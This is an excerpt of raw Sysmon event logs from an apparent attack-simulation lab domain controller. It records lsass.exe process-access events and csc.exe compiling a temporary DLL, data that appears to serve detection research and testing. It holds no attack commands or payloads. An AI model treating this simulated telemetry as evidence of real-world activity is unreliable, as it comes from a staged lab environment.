13:54:41.613{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004444Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.613{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004443Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:41.114{10ACEC4A-85A1-5FCF-DD00-000000009101}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\vdfrlhva\vdfrlhva.dll2020-12-08 13:54:41.036 10341000x80000000000000004442Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.114{10ACEC4A-859F-5FCF-D300-000000009101}50044516C:\Windows\system32\conhost.exe{10ACEC4A-85A1-5FCF-DE00-000000009101}4972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004441Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.114{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004440Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.114{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004439Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.114{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004438Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.114{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004437Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.114{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004436Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.114{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004435Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.114{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004434Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.114{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004433Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.114{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85A1-5FCF-DE00-000000009101}4972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004432Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.114{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004431Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.114{10ACEC4A-85A1-5FCF-DD00-000000009101}27962756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-85A1-5FCF-DE00-000000009101}4972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004430Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.114{10ACEC4A-85A1-5FCF-DE00-000000009101}4972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES95F1.tmp" "c:\Users\Administrator\AppData\Local\Temp\vdfrlhva\CSCE1B25767D8494833BDC57358DA60401A.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-859F-5FCF-CB41-080000000000}0x841cb0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-85A1-5FCF-DD00-000000009101}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\vdfrlhva\vdfrlhva.cmdline" 10341000x80000000000000004429Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.051{10ACEC4A-859F-5FCF-D300-000000009101}50044516C:\Windows\system32\conhost.exe{10ACEC4A-85A1-5FCF-DD00-000000009101}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004428Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.051{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004427Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.051{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004426Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.036{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004425Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.036{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004424Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.036{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004423Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.036{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004422Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.036{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004421Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.036{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004420Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.036{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|